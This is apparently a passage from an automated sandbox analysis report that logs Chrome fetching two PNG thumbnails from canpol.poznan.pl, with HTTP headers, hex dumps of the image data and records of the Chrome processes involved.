                                                            2025-01-15 10:08:09 UTC928INData Raw: aa 57 af 5e f1 8e 89 c3 49 38 b8 61 ed 1f d8 75 0e 22 0d 6a ca b4 74 3e 9f 4f e7 f5 7a 59 56 a5 a7 cf 6a 1a 04 1a cf db 83 32 86 2a 1c bf 52 a9 f4 d0 e0 a2 8c ca ae 52 a9 ac f4 d9 4e e3 ed 34 d9 85 40 76 c5 6f 62 8e 31 dc b0 62 03 33 1f d6 0c 34 90 31 25 bb 5c ae 64 fa 9b 49 e2 d6 92 d0 55 ac af 8a 75 b8 b3 8b 4d 79 df 55 e2 d0 f6 91 30 ec 42 d0 96 fb 02 bd f4 d7 46 26 56 49 bf 67 3d fd bc 75 f4 7b 5a 11 30 30 de d1 1e 65 b8 61 45 0f e6 3a aa 96 be aa 34 32 a9 3c 32 25 13 f3 27 d6 a9 de 72 31 29 7b 94 08 3b ad ed 6f b3 0c 42 7c ef 38 ae ad f0 15 5d 4c 0b 67 1d a1 d6 d7 16 7f 9b 79 da fe ed 6c 9d dd c5 d3 31 b6 ce f6 b5 b3 f5 74 36 5f 57 e3 bb da 3f 20 74 99 85 6b 2e ed b6 df 72 f6 90 65 c9 bd c8 bb f2 98 91 d1 e7 26 b5 5a 5d 42 26 56 dd d2 b7 d5 f6 37 e7
                                                            Data Ascii: W^I8au"jt>OzYVj2*RRN4@vob1b341%\dIUuMyU0BF&VIg=u{Z00eaE:42<2%'r1){;oB|8]Lgyl1t6_W? tk.re&Z]B&V7


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            148192.168.2.1649212178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:09 UTC418OUTGET /wp-content/uploads/2015/07/biedronka_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:09 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:25 GMT
                                                            ETag: "57b5-620a8b5244e98"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 22453
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ec 5d 07 60 14 d5 d6 fe 66 76 b6 97 f4 9e 90 06 04 82 f4 de 14 b1 a3 88 0d c5 82 f5 d9 eb 7b fa 3f 7b c3 f7 ec bd 3d 7b c5 2e 28 a8 28 a2 a0 a0 34 69 a1 84 50 13 d2 7b d9 64 37 5b 67 fe 73 67 13 0c 31 40 16 77 cd 6e 9c 4f 97 cd ce dc b9 73 e6 ce 77 bf 7b ce bd 77 ee 08 92 24 21 14 21 f4 b4 01 07 83 62 98 bf e8 1d 86 15 15 15 49 19 19 19 7f e6 7c 5c 77 13 fa 63 d8 9f 35 4a ce 03 dd 34 ee 2f bf 95 6b d7 ae 5d 3f 66 cc 98 91 87 4b e7 a7 61 e2 91 da d3 06 1e cd cd cd 23 ba 93 b2 77 90 bf 1d ac b5 18 36 7a 14 36 ae fb 8d ca 80 0f b4 4d 32 8e c8 b0 e8 c4 04 34 54 d5 e2 aa
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx]`fv{?{={.((4iP{d7[gsg1@wnOsw{w$!!bI|\wc5J4/k]?fKa#w6z6M24T
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 9f c7 ed c6 71 27 9d 82 fa f5 ab 31 21 3a 1a 57 a7 27 61 f7 de 5d 48 4e 4a c1 f8 a3 27 e1 94 33 ce c5 1b cf 3e 0e 93 c1 02 a7 db 89 93 af bd 0a 0b 97 7f 0b 97 db 81 a3 27 4d a2 5c 3c e8 c9 65 10 3a ab 25 27 6f 61 f6 a8 89 5e be ca 10 ae 08 59 62 1d 1a 3c ee 7d e3 65 bc 7b eb ed 68 e0 45 44 a9 b4 78 e4 f5 b7 d0 f2 9f 87 30 60 50 2e 5a 5b dd d8 b6 31 0f f9 67 4d c7 84 a8 38 6c 91 5c 80 8a 9a 42 0f a9 82 5b 42 6c 72 3c f6 3c 9e 89 86 7f f5 07 8b 1d 7d b7 90 34 83 88 ac a2 1f 12 c7 6e 6e 1b e1 3a bc 38 97 df cf 41 ce a7 8e ed e9 0e f5 32 e0 fd 2f fe fd e3 9b 76 c5 b6 c4 6c 2b c7 89 70 72 5a b4 58 52 90 fa 8f 47 a1 4b 1e c5 6a 17 da 45 38 dc 28 16 b2 c4 3a b8 5a 71 38 e7 dc 33 31 35 bf 00 97 3d f9 0c 06 6f df 82 49 ab 7e 06 fe f5 4f dc 5c 5b 8b 38 b5 0a b1 16
                                                            Data Ascii: q'1!:W'a]HNJ'3>'M\<e:%'oa^Yb<}e{hEDx0`P.Z[1gM8l\B[Blr<<}4nn:8A2/vl+prZXRGKjE8(:Zq8315=oI~O\[8
                                                            2025-01-15 10:08:09 UTC6518INData Raw: 96 fd 34 15 e9 29 ab 48 0b 9a 48 44 34 74 2c 55 44 ad 13 4e f2 8a 9a c4 12 c4 dc 2a 21 f6 c4 5c ec 7d 75 0b 84 b9 66 88 0d 02 c4 66 27 09 ab 1b 99 57 d1 f9 4e 16 91 08 23 84 48 1b 55 62 35 dc f5 b1 a8 fc d0 85 c6 ed 0e b2 c9 03 5d b4 0e 89 97 1a 10 31 90 bc 2f 95 95 a2 29 f2 f2 0a 63 51 f8 9a 15 0d d5 22 8c 24 be 59 a7 c7 c1 e0 b5 92 c8 b4 92 a0 91 50 b8 92 51 f8 99 1d 9a 1d 16 f0 63 80 84 41 c9 28 fd a4 18 f5 de 56 0c bf cd 22 f7 c5 d5 af 54 a1 6a be 0b 2d 76 2f 04 35 79 a4 a3 dd 48 38 a5 0f d4 c9 25 90 48 1c 77 bd ce c1 50 9a 05 cf a4 2a 24 c4 67 63 fb bb 7b 80 16 d2 d2 38 11 39 37 90 38 a7 d7 d1 dd b0 c9 fd 4d 4e 5e 0b c1 c0 3a d7 48 10 eb d3 50 f4 41 33 74 b6 08 d4 b7 92 4d 59 76 0c ba 58 0b 6f 83 05 85 5f 36 a3 71 0d 5d 17 1d d3 f7 9c 48 12 41 c0 b6
                                                            Data Ascii: 4)HHD4t,UDN*!\}uff'WN#HUb5]1/)cQ"$YPQcA(V"Tj-v/5yH8%HwP*$gc{8978MN^:HPA3tMYvXo_6q]HA


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            149192.168.2.1649213178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:09 UTC659OUTGET /wp-content/uploads/2015/07/polomarket_glowna_thumb.png HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:09 UTC257INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:09 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:40:21 GMT
                                                            ETag: "7440-620a8b4e39c71"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 29760
                                                            Content-Type: image/png
                                                            2025-01-15 10:08:09 UTC7935INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 00 e1 08 06 00 00 01 05 7b b8 3d 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 20 00 49 44 41 54 78 9c ec 7d 09 80 1c 45 d5 ff af af 99 d9 d9 7b 37 f7 1d 12 12 92 10 12 08 84 70 a9 80 c8 21 ca 2d a0 a0 a2 22 a0 08 9e 80 a2 df a7 20 de 8a ca a7 c8 f7 17 14 c5 8b 4b e5 16 14 51 04 42 38 42 02 e1 08 e4 be 93 cd 66 37 7b cc ce f4 f5 7f 55 d5 dd d3 d3 d3 33 3b 93 ec 64 67 f8 fa 97 cc 4e 4f 77 75 55 75 f5 ab 57 ef bd 7a f5 4a b5 6d 1b d5 08 75 b8 2b 50 08 51 c5 ca c5 db a3 62 6b d7 ae b5 a7 4c 99 b2 37 e5 49 a5 26 2c a7 62 7b 5b 29 9e 07 4a ac 5c 59 2d d6 31 65 1a 64 59 0e 2f c5 a6 23 c9 c7 7a bc df 92 48 49 bf db d6 ac c4 92 25 4b 5e 58 b8 70 e1 82 21 ad 98 bf 52 79 d7 14
                                                            Data Ascii: PNGIHDR,{=pHYs.#.#x?v IDATx}E{7p!-" KQB8Bf7{U3;dgNOwuUuWzJmu+PQbkL7I&,b{[)J\Y-1edY/#zHI%K^Xp!Ry
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 76 17 b5 4b 58 9e 1d cb ce ce ad b9 44 c0 67 7b c4 fe 63 dc 80 ea 13 f4 fd 4a 63 b1 97 19 b6 39 77 d8 f5 b0 df ee 6e 2f 9e 1b 74 88 91 33 b8 bb 8b 7b dd 55 4e 6a 99 a8 18 6a 92 b0 f2 87 8c dc 97 21 76 7b 77 7e f3 7d 5e d9 a6 b8 ce 82 87 22 9b 43 05 89 2c 48 78 83 ed 79 54 c8 3c e0 12 cd 60 fb 26 15 b2 b2 57 72 d3 bc 4a a1 e6 08 8b 4f 26 3b 6e c0 dc 63 c1 1b bc 7c 69 fc 2f cc 75 a7 32 25 6f 39 56 90 80 82 e7 72 36 e1 f2 a5 0b 0a d3 85 88 2b f8 3b ac 8c 30 02 2b b4 39 61 34 a5 b3 0f a0 78 fb 8c 96 b6 70 d5 73 c1 2a e0 85 19 f6 e2 c2 38 87 9f 43 72 6e 66 09 37 b0 20 d1 84 6d b8 e8 bf 1e 2c a3 d8 c6 67 b5 48 50 2e 6a 8e b0 0a 35 b6 2b d7 e4 0d 5f 7e 59 2c 04 85 88 c8 cd 33 48 24 9e f7 6a c8 76 82 61 bf c3 38 5f b0 8c b0 fd 66 4b 11 de ab 99 f0 aa 92 b0 14 45
                                                            Data Ascii: vKXDg{cJc9wn/t3{UNjj!v{w~}^"C,HxyT<`&WrJO&;nc|i/u2%o9Vr6+;0+9a4xps*8Crnf7 m,gHP.j5+_~Y,3H$jva8_fKE
                                                            2025-01-15 10:08:09 UTC8000INData Raw: 6b c4 88 11 d3 9b 9b 9b d5 5a f5 59 2a 04 22 2a 6b fb f6 ed bb 1b 1b 1b 1f 3a e5 94 53 1e 26 31 e0 b1 6a 16 d4 c3 50 33 84 e5 40 67 72 d7 bb df fd 6e f6 f9 1e bd 80 f1 f4 69 b6 6d fb 6d 25 d5 2b 8a 92 8e c7 e3 db e9 9b 19 3f ab d2 4e 35 18 6a 8d b0 fc 48 11 17 db 42 1f 26 6f bc bd c6 42 16 82 4b 92 d8 90 57 7b eb be 1c d4 1a 61 c9 c4 9d 5a d2 e9 f4 04 e2 54 13 a8 f1 9b a8 57 4b 3e 17 15 3a b4 f3 88 cc 3d cf be d9 6f 7f 9a e0 3d c1 34 c5 f2 0c e6 15 86 52 ca 0c a9 2b 93 b3 74 1a fe 36 93 1c b9 85 14 95 ad a8 11 d9 ca 45 2d 11 56 03 69 45 d3 a8 d1 f7 a3 86 96 98 5d 8b 5e 42 e6 ed 26 b8 bb 70 7c ba c6 ea ba 3e 96 9e 3b 55 57 57 f7 b2 33 34 d6 04 17 ab 05 c2 62 5d b8 9d 1a 77 01 69 80 2a 35 6e c6 39 ef 4a ec 41 ca 0a 93 e4 dd 0d b8 fc 81 f9 fc 9b 72 05 8f 11
                                                            Data Ascii: kZY*"*k:S&1jP3@grnimm%+?N5jHB&oBKW{aZTWK>:=o=4R+t6E-ViE]^B&p|>;UWW34b]wi*5n9JAr
                                                            2025-01-15 10:08:09 UTC5825INData Raw: 24 85 6d f9 f5 6b 78 61 f3 cb 50 b3 3a 90 b3 6a ac 06 b4 c3 d7 95 26 15 fb 06 7b f1 2f 8f 3d 82 af dd fa 79 6a 33 e1 51 63 6d 15 ef 94 f9 8b 70 ce f2 55 38 f8 d2 4f 91 1b 39 2a fa 72 01 49 72 73 b2 6d c2 38 cf 04 ca d2 95 21 34 3c 0d 86 69 e0 cb f7 df 8b d1 dc 38 d4 e6 45 e8 c8 1a b8 f9 a3 43 f4 0c a0 6f 24 c9 b9 b9 74 fc f8 e5 85 f8 d4 7d 4d 18 22 f1 2c d1 5e 44 a9 a9 84 cb 07 8a 78 70 4f 0a e9 72 41 54 e3 61 95 bb e4 f9 9d fc 01 c0 41 19 34 bc f9 cf 24 1a 03 49 58 0d 84 65 4e f7 94 05 a5 27 11 83 de e4 bc e3 b6 12 67 a7 50 4e 4c 49 56 21 82 9c e5 78 19 1f ff ce f7 70 6c 72 0c b9 7c 0e dd 6d 9d 22 ae 28 47 4a 4c ca 54 1c 35 89 6d 41 1a a9 55 e3 f8 dc 57 bf 84 3e 92 3c 5a da db 70 f0 58 3f 2e fc f4 b5 78 fa 5f 1f c1 ef 2c 59 2e 26 bf 50 d7 4c 4e 55 5c c2
                                                            Data Ascii: $mkxaP:j&{/=yj3QcmpU8O9*rIrsm8!4<i8ECo$t}M",^DxpOrATaA4$IXeN'gPNLIV!xplr|m"(GJLT5mAUW><ZpX?.x_,Y.&PLNU\


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:05:07:48
                                                            Start date:15/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                            Imagebase:0x7ff7f9810000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:1
                                                            Start time:05:07:48
                                                            Start date:15/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1968,i,9372517278438592400,14477646121863632151,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                            Imagebase:0x7ff7f9810000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:05:07:50
                                                            Start date:15/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://canpol.poznan.pl"
                                                            Imagebase:0x7ff7f9810000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            No disassembly